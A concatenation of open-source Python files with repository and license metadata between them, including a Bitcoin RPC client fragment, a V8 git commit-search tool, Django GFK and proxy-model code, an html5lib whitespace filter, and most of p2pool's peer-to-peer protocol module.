elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = raw_input("Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = raw_input("Enter old wallet passphrase: ")
pwd2 = raw_input("Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported" | mit |
macchina-io/macchina.io | platform/JS/V8/v8/tools/release/search_related_commits.py | 22 | 6486 | #!/usr/bin/env python
# Copyright 2015 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import operator
import os
import re
from sets import Set
from subprocess import Popen, PIPE
import sys
def search_all_related_commits(
git_working_dir, start_hash, until, separator, verbose=False):
all_commits_raw = _find_commits_inbetween(
start_hash, until, git_working_dir, verbose)
if verbose:
print "All commits between <of> and <until>: " + all_commits_raw
# Adding start hash too
all_commits = [start_hash]
all_commits.extend(all_commits_raw.splitlines())
all_related_commits = {}
already_treated_commits = Set([])
for commit in all_commits:
if commit in already_treated_commits:
continue
related_commits = _search_related_commits(
git_working_dir, commit, until, separator, verbose)
if len(related_commits) > 0:
all_related_commits[commit] = related_commits
already_treated_commits.update(related_commits)
already_treated_commits.update(commit)
return all_related_commits
def _search_related_commits(
git_working_dir, start_hash, until, separator, verbose=False):
# Find commits in start_hash..until whose messages mention start_hash by
# hash, by its "{#NNNNN}" commit-position tag, or by its title. When a
# `separator` commit is given, only report hits that span the separator.
if separator:
commits_between = _find_commits_inbetween(
start_hash, separator, git_working_dir, verbose)
if commits_between == "":
return []
# Extract commit position
original_message = git_execute(
git_working_dir,
["show", "-s", "--format=%B", start_hash],
verbose)
title = original_message.splitlines()[0]
matches = re.search("(\{#)([0-9]*)(\})", original_message)
if not matches:
return []
commit_position = matches.group(2)
if verbose:
print "1.) Commit position to look for: " + commit_position
search_range = start_hash + ".." + until
# Build the `git log --grep` argument list for one search pattern.
def git_args(grep_pattern):
return [
"log",
"--reverse",
"--grep=" + grep_pattern,
"--format=%H",
search_range,
]
found_by_hash = git_execute(
git_working_dir, git_args(start_hash), verbose).strip()
if verbose:
print "2.) Found by hash: " + found_by_hash
found_by_commit_pos = git_execute(
git_working_dir, git_args(commit_position), verbose).strip()
if verbose:
print "3.) Found by commit position: " + found_by_commit_pos
# Replace brackets or else they are wrongly interpreted by --grep
title = title.replace("[", "\\[")
title = title.replace("]", "\\]")
found_by_title = git_execute(
git_working_dir, git_args(title), verbose).strip()
if verbose:
print "4.) Found by title: " + found_by_title
# Merge the three result lists, dropping duplicates but keeping order.
hits = (
_convert_to_array(found_by_hash) +
_convert_to_array(found_by_commit_pos) +
_convert_to_array(found_by_title))
hits = _remove_duplicates(hits)
# With a separator, keep the hits only if at least one of them lies on
# the far side of the separator commit.
if separator:
for current_hit in hits:
commits_between = _find_commits_inbetween(
separator, current_hit, git_working_dir, verbose)
if commits_between != "":
return hits
return []
return hits
def _find_commits_inbetween(start_hash, end_hash, git_working_dir, verbose):
    """Return the hashes in start_hash..end_hash, oldest first, newline-joined."""
    rev_range = start_hash + ".." + end_hash
    output = git_execute(
        git_working_dir, ["rev-list", "--reverse", rev_range], verbose)
    return output.strip()
def _convert_to_array(string_of_hashes):
return string_of_hashes.splitlines()
def _remove_duplicates(array):
no_duplicates = []
for current in array:
if not current in no_duplicates:
no_duplicates.append(current)
return no_duplicates
def git_execute(working_dir, args, verbose=False):
  """Run a git command in *working_dir* and return its stdout.

  Raises a plain Exception carrying git's stderr when git exits
  with a non-zero status.
  """
  # Argument-list form (no shell) avoids quoting problems with commit
  # titles that contain shell metacharacters.
  command = ["git", "-C", working_dir] + args
  if verbose:
    print "Git working dir: " + working_dir
    print "Executing git command:" + str(command)
  p = Popen(args=command, stdin=PIPE,
            stdout=PIPE, stderr=PIPE)
  output, err = p.communicate()
  rc = p.returncode
  if rc != 0:
    raise Exception(err)
  if verbose:
    print "Git return value: " + output
  return output
def _pretty_print_entry(hash, git_dir, pre_text, verbose):
  """Format one commit as '<pre_text><date> # <hash> # <subject>'."""
  show_args = [
      "show",
      "--quiet",
      "--date=iso",
      hash,
      "--format=%ad # %H # %s",
  ]
  formatted = git_execute(git_dir, show_args, verbose).strip()
  return pre_text + formatted
def main(options):
  """Yield an output line per commit: related-commit groups, oldest first.

  Top-level commits are prefixed with "+", their related follow-up
  commits with "| " (pretty-printed with date/hash/subject when
  options.prettyprint is set).
  """
  all_related_commits = search_all_related_commits(
      options.git_dir,
      options.of[0],
      options.until[0],
      options.separator,
      options.verbose)
  # Sort top-level commits chronologically by their ISO author date
  # string; the key function runs one `git show` per commit.
  sort_key = lambda x: (
      git_execute(
          options.git_dir,
          ["show", "--quiet", "--date=iso", x, "--format=%ad"],
          options.verbose)).strip()
  high_level_commits = sorted(all_related_commits.keys(), key=sort_key)
  for current_key in high_level_commits:
    if options.prettyprint:
      yield _pretty_print_entry(
          current_key,
          options.git_dir,
          "+",
          options.verbose)
    else:
      yield "+" + current_key
    found_commits = all_related_commits[current_key]
    for current_commit in found_commits:
      if options.prettyprint:
        yield _pretty_print_entry(
            current_commit,
            options.git_dir,
            "| ",
            options.verbose)
      else:
        yield "| " + current_commit
# Command-line entry point: parse arguments, run the search and print
# each produced line (Python 2 script).
if __name__ == "__main__": # pragma: no cover
  parser = argparse.ArgumentParser(
      "This tool analyzes the commit range between <of> and <until>. "
      "It finds commits which belong together e.g. Implement/Revert pairs and "
      "Implement/Port/Revert triples. All supplied hashes need to be "
      "from the same branch e.g. master.")
  parser.add_argument("-g", "--git-dir", required=False, default=".",
                      help="The path to your git working directory.")
  parser.add_argument("--verbose", action="store_true",
                      help="Enables a very verbose output")
  parser.add_argument("of", nargs=1,
                      help="Hash of the commit to be searched.")
  parser.add_argument("until", nargs=1,
                      help="Commit when searching should stop")
  parser.add_argument("--separator", required=False,
                      help="The script will only list related commits "
                           "which are separated by hash <--separator>.")
  parser.add_argument("--prettyprint", action="store_true",
                      help="Pretty prints the output")
  args = sys.argv[1:]
  options = parser.parse_args(args)
  for current_line in main(options):
    print current_line
| apache-2.0 |
affan2/django-activity-stream | actstream/gfk.py | 5 | 3322 | from django.conf import settings
from django.db.models import Manager
from django.db.models.query import QuerySet, EmptyQuerySet
from django.utils.encoding import smart_unicode
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.generic import GenericForeignKey
class GFKManager(Manager):
    """Manager whose querysets are GFKQuerySet instances.

    Every queryset produced through this manager therefore exposes
    fetch_generic_relations() and the GFK-aware none().
    """
    def get_query_set(self):
        """Build the base queryset as a GFKQuerySet on this manager's db."""
        queryset = GFKQuerySet(self.model, using=self.db)
        return queryset
    def none(self):
        """Return an empty GFK-aware queryset."""
        base = self.get_query_set()
        return base.none()
class GFKQuerySet(QuerySet):
    """
    A QuerySet with a fetch_generic_relations() method to bulk fetch
    all generic related items. Similar to select_related(), but for
    generic foreign keys.
    Based on http://www.djangosnippets.org/snippets/984/
    Firstly improved at http://www.djangosnippets.org/snippets/1079/
    Extended in django-activity-stream to allow for multi db, text primary keys
    and empty querysets.
    """
    def fetch_generic_relations(self, *args):
        # Bulk-fetch the objects behind every GenericForeignKey on the
        # model (or only the GFKs named in *args) and attach them to the
        # items of this queryset, avoiding one query per row.
        from actstream import settings as actstream_settings
        qs = self._clone()
        if not actstream_settings.FETCH_RELATIONS:
            return qs
        gfk_fields = [g for g in self.model._meta.virtual_fields
                      if isinstance(g, GenericForeignKey)]
        if args:
            gfk_fields = filter(lambda g: g.name in args, gfk_fields)
        # Prefer Django's native prefetch_related() when it is available
        # and enabled via settings.
        if actstream_settings.USE_PREFETCH and hasattr(self, 'prefetch_related'):
            return qs.prefetch_related(*[g.name for g in gfk_fields])
        # ct_map: content_type_id -> {object_pk (as text): (gfk name, item pk)}
        # data_map: (content_type_id, object_pk) -> fetched related object
        # Primary keys are normalised through smart_unicode so text and
        # integer pks share one representation.
        ct_map, data_map = {}, {}
        for item in qs:
            for gfk in gfk_fields:
                if getattr(item, gfk.fk_field) is None:
                    continue
                ct_id_field = self.model._meta.get_field(gfk.ct_field).column
                if getattr(item, ct_id_field) is None:
                    continue
                ct_map.setdefault(getattr(item, ct_id_field), {}
                )[smart_unicode(getattr(item, gfk.fk_field))] = (gfk.name,
                    item.pk)
        # One query per distinct content type, fetching all referenced
        # pks of that type at once.
        ctypes = ContentType.objects.using(self.db).in_bulk(ct_map.keys())
        for ct_id, items_ in ct_map.items():
            if ct_id:
                ct = ctypes[ct_id]
                model_class = ct.model_class()
                objects = model_class._default_manager.select_related(
                    depth=actstream_settings.GFK_FETCH_DEPTH)
                for o in objects.filter(pk__in=items_.keys()):
                    (gfk_name, item_id) = items_[smart_unicode(o.pk)]
                    data_map[(ct_id, smart_unicode(o.pk))] = o
        # Second pass: attach each fetched object onto its item's GFK
        # attribute so later attribute access hits the cache, not the db.
        for item in qs:
            for gfk in gfk_fields:
                if getattr(item, gfk.fk_field) != None:
                    ct_id_field = self.model._meta.get_field(gfk.ct_field)\
                        .column
                    setattr(item, gfk.name,
                        data_map[(
                            getattr(item, ct_id_field),
                            smart_unicode(getattr(item, gfk.fk_field))
                        )])
        return qs
    def none(self):
        # Keep the GFK API available on empty querysets.
        return self._clone(klass=EmptyGFKQuerySet)
class EmptyGFKQuerySet(GFKQuerySet, EmptyQuerySet):
    """Empty queryset that keeps the GFKQuerySet API available."""
    def fetch_generic_relations(self, *args):
        """No-op: there is nothing to fetch on an empty queryset.

        Accepts the same *args as GFKQuerySet.fetch_generic_relations;
        the original signature took no arguments, so passing field
        names on an empty queryset raised TypeError.
        """
        return self
| bsd-3-clause |
MRigal/django | tests/proxy_models/models.py | 97 | 4411 | """
By specifying the 'proxy' Meta attribute, model subclasses can specify that
they will take data directly from the table of their base class table rather
than using a new table of their own. This allows them to act as simple proxies,
providing a modified interface to the data from the base class.
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
# A couple of managers for testing managing overriding in proxy model cases.
class PersonManager(models.Manager):
    # Default manager for Person: hides every row named "fred"; used to
    # test manager overriding on proxy models.
    def get_queryset(self):
        return super(PersonManager, self).get_queryset().exclude(name="fred")
class SubManager(models.Manager):
    # Alternate manager installed on proxy subclasses: hides every row
    # named "wilma".
    def get_queryset(self):
        return super(SubManager, self).get_queryset().exclude(name="wilma")
@python_2_unicode_compatible
class Person(models.Model):
    """
    A simple concrete base class.
    """
    name = models.CharField(max_length=50)
    # Custom default manager (excludes name == "fred").
    objects = PersonManager()
    def __str__(self):
        return self.name
class Abstract(models.Model):
"""
A simple abstract base class, to be used for error checking.
"""
data = models.CharField(max_length=10)
class Meta:
abstract = True
class MyPerson(Person):
"""
A proxy subclass, this should not get a new table. Overrides the default
manager.
"""
class Meta:
proxy = True
ordering = ["name"]
permissions = (
("display_users", "May display users information"),
)
objects = SubManager()
other = PersonManager()
def has_special_name(self):
return self.name.lower() == "special"
class ManagerMixin(models.Model):
    # Abstract mixin that contributes an extra manager (excludes
    # "wilma") to concrete subclasses such as OtherPerson.
    excluder = SubManager()
    class Meta:
        abstract = True
class OtherPerson(Person, ManagerMixin):
"""
A class with the default manager from Person, plus an secondary manager.
"""
class Meta:
proxy = True
ordering = ["name"]
class StatusPerson(MyPerson):
"""
A non-proxy subclass of a proxy, it should get a new table.
"""
status = models.CharField(max_length=80)
# We can even have proxies of proxies (and subclass of those).
class MyPersonProxy(MyPerson):
class Meta:
proxy = True
class LowerStatusPerson(MyPersonProxy):
status = models.CharField(max_length=80)
@python_2_unicode_compatible
class User(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class UserProxy(User):
class Meta:
proxy = True
class UserProxyProxy(UserProxy):
class Meta:
proxy = True
# We can still use `select_related()` to include related models in our querysets.
class Country(models.Model):
    # Target of State.country; exercised via select_related() through
    # StateProxy.
    name = models.CharField(max_length=50)
@python_2_unicode_compatible
class State(models.Model):
    # Carries a ForeignKey so its proxy (StateProxy) can be tested with
    # filters and select_related() on related fields.
    name = models.CharField(max_length=50)
    country = models.ForeignKey(Country)
    def __str__(self):
        return self.name
class StateProxy(State):
class Meta:
proxy = True
# Proxy models still works with filters (on related fields)
# and select_related, even when mixed with model inheritance
@python_2_unicode_compatible
class BaseUser(models.Model):
name = models.CharField(max_length=255)
def __str__(self):
return ':'.join((self.__class__.__name__, self.name,))
class TrackerUser(BaseUser):
    # Concrete (multi-table) subclass of BaseUser; proxied by
    # ProxyTrackerUser below.
    status = models.CharField(max_length=50)
class ProxyTrackerUser(TrackerUser):
class Meta:
proxy = True
@python_2_unicode_compatible
class Issue(models.Model):
summary = models.CharField(max_length=255)
assignee = models.ForeignKey(ProxyTrackerUser)
def __str__(self):
return ':'.join((self.__class__.__name__, self.summary,))
class Bug(Issue):
    # Concrete subclass of Issue with its own FK; ProxyBug and
    # ProxyProxyBug proxy it to test proxies of inherited models.
    version = models.CharField(max_length=50)
    reporter = models.ForeignKey(BaseUser)
class ProxyBug(Bug):
"""
Proxy of an inherited class
"""
class Meta:
proxy = True
class ProxyProxyBug(ProxyBug):
"""
A proxy of proxy model with related field
"""
class Meta:
proxy = True
class Improvement(Issue):
"""
A model that has relation to a proxy model
or to a proxy of proxy model
"""
version = models.CharField(max_length=50)
reporter = models.ForeignKey(ProxyTrackerUser)
associated_bug = models.ForeignKey(ProxyProxyBug)
class ProxyImprovement(Improvement):
class Meta:
proxy = True
| bsd-3-clause |
bgris/ODL_bgris | lib/python3.5/site-packages/pip/_vendor/html5lib/filters/whitespace.py | 353 | 1139 | from __future__ import absolute_import, division, unicode_literals
import re
from . import base
from ..constants import rcdataElements, spaceCharacters
spaceCharacters = "".join(spaceCharacters)
SPACES_REGEX = re.compile("[%s]+" % spaceCharacters)
class Filter(base.Filter):
    # Collapses runs of whitespace in the token stream to a single
    # space, except inside elements where whitespace is significant:
    # <pre>, <textarea> and the rcdata elements (e.g. <script>, <style>).
    spacePreserveElements = frozenset(["pre", "textarea"] + list(rcdataElements))
    def __iter__(self):
        # Nesting depth of whitespace-preserving elements; collapsing
        # only happens while we are outside all of them (preserve == 0).
        preserve = 0
        for token in base.Filter.__iter__(self):
            type = token["type"]
            if type == "StartTag" \
                    and (preserve or token["name"] in self.spacePreserveElements):
                preserve += 1
            elif type == "EndTag" and preserve:
                preserve -= 1
            elif not preserve and type == "SpaceCharacters" and token["data"]:
                # Test on token["data"] above to not introduce spaces where there were not
                token["data"] = " "
            elif not preserve and type == "Characters":
                token["data"] = collapse_spaces(token["data"])
            yield token
def collapse_spaces(text):
    """Replace each run of HTML whitespace in *text* with one space."""
    collapsed = SPACES_REGEX.sub(' ', text)
    return collapsed
| gpl-3.0 |
zcoder/p2pool | p2pool/p2p.py | 39 | 28021 | from __future__ import division
import math
import random
import sys
import time
from twisted.internet import defer, protocol, reactor
from twisted.python import failure, log
import p2pool
from p2pool import data as p2pool_data
from p2pool.bitcoin import data as bitcoin_data
from p2pool.util import deferral, p2protocol, pack, variable
class PeerMisbehavingError(Exception):
    # Raised when a peer violates the protocol; handled by
    # disconnecting and (except for localhost) banning the address.
    pass
def fragment(f, **kwargs):
    """Call f(**kwargs); if the packet is too long, split and retry.

    Every keyword value is assumed to be a sliceable sequence: on
    p2protocol.TooLong each value is halved and both halves are sent
    recursively. NOTE(review): a single element that is itself too
    large would recurse indefinitely -- presumably this cannot occur
    with the share/tx lists passed here; confirm with callers.
    """
    try:
        f(**kwargs)
    except p2protocol.TooLong:
        fragment(f, **dict((k, v[:len(v)//2]) for k, v in kwargs.iteritems()))
        fragment(f, **dict((k, v[len(v)//2:]) for k, v in kwargs.iteritems()))
class Protocol(p2protocol.Protocol):
VERSION = 1300
max_remembered_txs_size = 2500000
def __init__(self, node, incoming):
p2protocol.Protocol.__init__(self, node.net.PREFIX, 1000000, node.traffic_happened)
self.node = node
self.incoming = incoming
self.other_version = None
self.connected2 = False
def connectionMade(self):
self.factory.proto_made_connection(self)
self.connection_lost_event = variable.Event()
self.addr = self.transport.getPeer().host, self.transport.getPeer().port
self.send_version(
version=self.VERSION,
services=0,
addr_to=dict(
services=0,
address=self.transport.getPeer().host,
port=self.transport.getPeer().port,
),
addr_from=dict(
services=0,
address=self.transport.getHost().host,
port=self.transport.getHost().port,
),
nonce=self.node.nonce,
sub_version=p2pool.__version__,
mode=1,
best_share_hash=self.node.best_share_hash_func(),
)
self.timeout_delayed = reactor.callLater(10, self._connect_timeout)
self.get_shares = deferral.GenericDeferrer(
max_id=2**256,
func=lambda id, hashes, parents, stops: self.send_sharereq(id=id, hashes=hashes, parents=parents, stops=stops),
timeout=15,
on_timeout=self.disconnect,
)
self.remote_tx_hashes = set() # view of peer's known_txs # not actually initially empty, but sending txs instead of tx hashes won't hurt
self.remote_remembered_txs_size = 0
self.remembered_txs = {} # view of peer's mining_txs
self.remembered_txs_size = 0
self.known_txs_cache = {}
def _connect_timeout(self):
self.timeout_delayed = None
print 'Handshake timed out, disconnecting from %s:%i' % self.addr
self.disconnect()
def packetReceived(self, command, payload2):
try:
if command != 'version' and not self.connected2:
raise PeerMisbehavingError('first message was not version message')
p2protocol.Protocol.packetReceived(self, command, payload2)
except PeerMisbehavingError, e:
print 'Peer %s:%i misbehaving, will drop and ban. Reason:' % self.addr, e.message
self.badPeerHappened()
def badPeerHappened(self):
if p2pool.DEBUG:
print "Bad peer banned:", self.addr
self.disconnect()
if self.transport.getPeer().host != '127.0.0.1': # never ban localhost
self.node.bans[self.transport.getPeer().host] = time.time() + 60*60
def _timeout(self):
self.timeout_delayed = None
print 'Connection timed out, disconnecting from %s:%i' % self.addr
self.disconnect()
message_version = pack.ComposedType([
('version', pack.IntType(32)),
('services', pack.IntType(64)),
('addr_to', bitcoin_data.address_type),
('addr_from', bitcoin_data.address_type),
('nonce', pack.IntType(64)),
('sub_version', pack.VarStrType()),
('mode', pack.IntType(32)), # always 1 for legacy compatibility
('best_share_hash', pack.PossiblyNoneType(0, pack.IntType(256))),
])
def handle_version(self, version, services, addr_to, addr_from, nonce, sub_version, mode, best_share_hash):
if self.other_version is not None:
raise PeerMisbehavingError('more than one version message')
if version < 1300:
raise PeerMisbehavingError('peer too old')
self.other_version = version
self.other_sub_version = sub_version[:512]
self.other_services = services
if nonce == self.node.nonce:
raise PeerMisbehavingError('was connected to self')
if nonce in self.node.peers:
if p2pool.DEBUG:
print 'Detected duplicate connection, disconnecting from %s:%i' % self.addr
self.disconnect()
return
self.nonce = nonce
self.connected2 = True
self.timeout_delayed.cancel()
self.timeout_delayed = reactor.callLater(100, self._timeout)
old_dataReceived = self.dataReceived
def new_dataReceived(data):
if self.timeout_delayed is not None:
self.timeout_delayed.reset(100)
old_dataReceived(data)
self.dataReceived = new_dataReceived
self.factory.proto_connected(self)
self._stop_thread = deferral.run_repeatedly(lambda: [
self.send_ping(),
random.expovariate(1/100)][-1])
if self.node.advertise_ip:
self._stop_thread2 = deferral.run_repeatedly(lambda: [
self.send_addrme(port=self.node.serverfactory.listen_port.getHost().port) if self.node.serverfactory.listen_port is not None else None,
random.expovariate(1/(100*len(self.node.peers) + 1))][-1])
if best_share_hash is not None:
self.node.handle_share_hashes([best_share_hash], self)
def update_remote_view_of_my_known_txs(before, after):
added = set(after) - set(before)
removed = set(before) - set(after)
if added:
self.send_have_tx(tx_hashes=list(added))
if removed:
self.send_losing_tx(tx_hashes=list(removed))
# cache forgotten txs here for a little while so latency of "losing_tx" packets doesn't cause problems
key = max(self.known_txs_cache) + 1 if self.known_txs_cache else 0
self.known_txs_cache[key] = dict((h, before[h]) for h in removed)
reactor.callLater(20, self.known_txs_cache.pop, key)
watch_id = self.node.known_txs_var.transitioned.watch(update_remote_view_of_my_known_txs)
self.connection_lost_event.watch(lambda: self.node.known_txs_var.transitioned.unwatch(watch_id))
self.send_have_tx(tx_hashes=self.node.known_txs_var.value.keys())
def update_remote_view_of_my_mining_txs(before, after):
added = set(after) - set(before)
removed = set(before) - set(after)
if added:
self.remote_remembered_txs_size += sum(100 + bitcoin_data.tx_type.packed_size(after[x]) for x in added)
assert self.remote_remembered_txs_size <= self.max_remembered_txs_size
fragment(self.send_remember_tx, tx_hashes=[x for x in added if x in self.remote_tx_hashes], txs=[after[x] for x in added if x not in self.remote_tx_hashes])
if removed:
self.send_forget_tx(tx_hashes=list(removed))
self.remote_remembered_txs_size -= sum(100 + bitcoin_data.tx_type.packed_size(before[x]) for x in removed)
watch_id2 = self.node.mining_txs_var.transitioned.watch(update_remote_view_of_my_mining_txs)
self.connection_lost_event.watch(lambda: self.node.mining_txs_var.transitioned.unwatch(watch_id2))
self.remote_remembered_txs_size += sum(100 + bitcoin_data.tx_type.packed_size(x) for x in self.node.mining_txs_var.value.values())
assert self.remote_remembered_txs_size <= self.max_remembered_txs_size
fragment(self.send_remember_tx, tx_hashes=[], txs=self.node.mining_txs_var.value.values())
message_ping = pack.ComposedType([])
def handle_ping(self):
pass
message_addrme = pack.ComposedType([
('port', pack.IntType(16)),
])
def handle_addrme(self, port):
host = self.transport.getPeer().host
#print 'addrme from', host, port
if host == '127.0.0.1':
if random.random() < .8 and self.node.peers:
random.choice(self.node.peers.values()).send_addrme(port=port) # services...
else:
self.node.got_addr((self.transport.getPeer().host, port), self.other_services, int(time.time()))
if random.random() < .8 and self.node.peers:
random.choice(self.node.peers.values()).send_addrs(addrs=[
dict(
address=dict(
services=self.other_services,
address=host,
port=port,
),
timestamp=int(time.time()),
),
])
message_addrs = pack.ComposedType([
('addrs', pack.ListType(pack.ComposedType([
('timestamp', pack.IntType(64)),
('address', bitcoin_data.address_type),
]))),
])
def handle_addrs(self, addrs):
for addr_record in addrs:
self.node.got_addr((addr_record['address']['address'], addr_record['address']['port']), addr_record['address']['services'], min(int(time.time()), addr_record['timestamp']))
if random.random() < .8 and self.node.peers:
random.choice(self.node.peers.values()).send_addrs(addrs=[addr_record])
message_getaddrs = pack.ComposedType([
('count', pack.IntType(32)),
])
def handle_getaddrs(self, count):
if count > 100:
count = 100
self.send_addrs(addrs=[
dict(
timestamp=int(self.node.addr_store[host, port][2]),
address=dict(
services=self.node.addr_store[host, port][0],
address=host,
port=port,
),
) for host, port in
self.node.get_good_peers(count)
])
message_shares = pack.ComposedType([
('shares', pack.ListType(p2pool_data.share_type)),
])
def handle_shares(self, shares):
result = []
for wrappedshare in shares:
if wrappedshare['type'] < p2pool_data.Share.VERSION: continue
share = p2pool_data.load_share(wrappedshare, self.node.net, self.addr)
if wrappedshare['type'] >= 13:
txs = []
for tx_hash in share.share_info['new_transaction_hashes']:
if tx_hash in self.node.known_txs_var.value:
tx = self.node.known_txs_var.value[tx_hash]
else:
for cache in self.known_txs_cache.itervalues():
if tx_hash in cache:
tx = cache[tx_hash]
print 'Transaction %064x rescued from peer latency cache!' % (tx_hash,)
break
else:
print >>sys.stderr, 'Peer referenced unknown transaction %064x, disconnecting' % (tx_hash,)
self.disconnect()
return
txs.append(tx)
else:
txs = None
result.append((share, txs))
self.node.handle_shares(result, self)
def sendShares(self, shares, tracker, known_txs, include_txs_with=[]):
tx_hashes = set()
for share in shares:
if share.VERSION >= 13:
# send full transaction for every new_transaction_hash that peer does not know
for tx_hash in share.share_info['new_transaction_hashes']:
assert tx_hash in known_txs, 'tried to broadcast share without knowing all its new transactions'
if tx_hash not in self.remote_tx_hashes:
tx_hashes.add(tx_hash)
continue
if share.hash in include_txs_with:
x = share.get_other_tx_hashes(tracker)
if x is not None:
tx_hashes.update(x)
hashes_to_send = [x for x in tx_hashes if x not in self.node.mining_txs_var.value and x in known_txs]
new_remote_remembered_txs_size = self.remote_remembered_txs_size + sum(100 + bitcoin_data.tx_type.packed_size(known_txs[x]) for x in hashes_to_send)
if new_remote_remembered_txs_size > self.max_remembered_txs_size:
raise ValueError('shares have too many txs')
self.remote_remembered_txs_size = new_remote_remembered_txs_size
fragment(self.send_remember_tx, tx_hashes=[x for x in hashes_to_send if x in self.remote_tx_hashes], txs=[known_txs[x] for x in hashes_to_send if x not in self.remote_tx_hashes])
fragment(self.send_shares, shares=[share.as_share() for share in shares])
self.send_forget_tx(tx_hashes=hashes_to_send)
self.remote_remembered_txs_size -= sum(100 + bitcoin_data.tx_type.packed_size(known_txs[x]) for x in hashes_to_send)
message_sharereq = pack.ComposedType([
('id', pack.IntType(256)),
('hashes', pack.ListType(pack.IntType(256))),
('parents', pack.VarIntType()),
('stops', pack.ListType(pack.IntType(256))),
])
def handle_sharereq(self, id, hashes, parents, stops):
shares = self.node.handle_get_shares(hashes, parents, stops, self)
try:
self.send_sharereply(id=id, result='good', shares=[share.as_share() for share in shares])
except p2protocol.TooLong:
self.send_sharereply(id=id, result='too long', shares=[])
message_sharereply = pack.ComposedType([
('id', pack.IntType(256)),
('result', pack.EnumType(pack.VarIntType(), {0: 'good', 1: 'too long', 2: 'unk2', 3: 'unk3', 4: 'unk4', 5: 'unk5', 6: 'unk6'})),
('shares', pack.ListType(p2pool_data.share_type)),
])
class ShareReplyError(Exception): pass
def handle_sharereply(self, id, result, shares):
if result == 'good':
res = [p2pool_data.load_share(share, self.node.net, self.addr) for share in shares if share['type'] >= p2pool_data.Share.VERSION]
else:
res = failure.Failure(self.ShareReplyError(result))
self.get_shares.got_response(id, res)
message_bestblock = pack.ComposedType([
('header', bitcoin_data.block_header_type),
])
def handle_bestblock(self, header):
self.node.handle_bestblock(header, self)
message_have_tx = pack.ComposedType([
('tx_hashes', pack.ListType(pack.IntType(256))),
])
def handle_have_tx(self, tx_hashes):
#assert self.remote_tx_hashes.isdisjoint(tx_hashes)
self.remote_tx_hashes.update(tx_hashes)
while len(self.remote_tx_hashes) > 10000:
self.remote_tx_hashes.pop()
message_losing_tx = pack.ComposedType([
('tx_hashes', pack.ListType(pack.IntType(256))),
])
def handle_losing_tx(self, tx_hashes):
#assert self.remote_tx_hashes.issuperset(tx_hashes)
self.remote_tx_hashes.difference_update(tx_hashes)
message_remember_tx = pack.ComposedType([
('tx_hashes', pack.ListType(pack.IntType(256))),
('txs', pack.ListType(bitcoin_data.tx_type)),
])
def handle_remember_tx(self, tx_hashes, txs):
for tx_hash in tx_hashes:
if tx_hash in self.remembered_txs:
print >>sys.stderr, 'Peer referenced transaction twice, disconnecting'
self.disconnect()
return
if tx_hash in self.node.known_txs_var.value:
tx = self.node.known_txs_var.value[tx_hash]
else:
for cache in self.known_txs_cache.itervalues():
if tx_hash in cache:
tx = cache[tx_hash]
print 'Transaction %064x rescued from peer latency cache!' % (tx_hash,)
break
else:
print >>sys.stderr, 'Peer referenced unknown transaction %064x, disconnecting' % (tx_hash,)
self.disconnect()
return
self.remembered_txs[tx_hash] = tx
self.remembered_txs_size += 100 + bitcoin_data.tx_type.packed_size(tx)
new_known_txs = dict(self.node.known_txs_var.value)
warned = False
for tx in txs:
tx_hash = bitcoin_data.hash256(bitcoin_data.tx_type.pack(tx))
if tx_hash in self.remembered_txs:
print >>sys.stderr, 'Peer referenced transaction twice, disconnecting'
self.disconnect()
return
if tx_hash in self.node.known_txs_var.value and not warned:
print 'Peer sent entire transaction %064x that was already received' % (tx_hash,)
warned = True
self.remembered_txs[tx_hash] = tx
self.remembered_txs_size += 100 + bitcoin_data.tx_type.packed_size(tx)
new_known_txs[tx_hash] = tx
self.node.known_txs_var.set(new_known_txs)
if self.remembered_txs_size >= self.max_remembered_txs_size:
raise PeerMisbehavingError('too much transaction data stored')
message_forget_tx = pack.ComposedType([
('tx_hashes', pack.ListType(pack.IntType(256))),
])
def handle_forget_tx(self, tx_hashes):
for tx_hash in tx_hashes:
self.remembered_txs_size -= 100 + bitcoin_data.tx_type.packed_size(self.remembered_txs[tx_hash])
assert self.remembered_txs_size >= 0
del self.remembered_txs[tx_hash]
def connectionLost(self, reason):
self.connection_lost_event.happened()
if self.timeout_delayed is not None:
self.timeout_delayed.cancel()
if self.connected2:
self.factory.proto_disconnected(self, reason)
self._stop_thread()
if self.node.advertise_ip:
self._stop_thread2()
self.connected2 = False
self.factory.proto_lost_connection(self, reason)
if p2pool.DEBUG:
print "Peer connection lost:", self.addr, reason
self.get_shares.respond_all(reason)
@defer.inlineCallbacks
def do_ping(self):
start = reactor.seconds()
yield self.get_shares(hashes=[0], parents=0, stops=[])
end = reactor.seconds()
defer.returnValue(end - start)
class ServerFactory(protocol.ServerFactory):
    # Accepts incoming peer connections, capped globally (max_conns)
    # and per /16 network (3 connections), and honours the node's ban
    # list.
    def __init__(self, node, max_conns):
        self.node = node
        self.max_conns = max_conns
        self.conns = {}  # (a, b) /16 ident -> count of open connections
        self.running = False
        self.listen_port = None
    def buildProtocol(self, addr):
        # Returning None tells Twisted to refuse the connection: over
        # the global or per-/16 limit, or the address is still banned.
        if sum(self.conns.itervalues()) >= self.max_conns or self.conns.get(self._host_to_ident(addr.host), 0) >= 3:
            return None
        if addr.host in self.node.bans and self.node.bans[addr.host] > time.time():
            return None
        p = Protocol(self.node, True)
        p.factory = self
        if p2pool.DEBUG:
            print "Got peer connection from:", addr
        return p
    def _host_to_ident(self, host):
        # Group peers by the first two IPv4 octets (a /16 network).
        a, b, c, d = host.split('.')
        return a, b
    def proto_made_connection(self, proto):
        ident = self._host_to_ident(proto.transport.getPeer().host)
        self.conns[ident] = self.conns.get(ident, 0) + 1
    def proto_lost_connection(self, proto, reason):
        ident = self._host_to_ident(proto.transport.getPeer().host)
        self.conns[ident] -= 1
        if not self.conns[ident]:
            del self.conns[ident]
    def proto_connected(self, proto):
        self.node.got_conn(proto)
    def proto_disconnected(self, proto, reason):
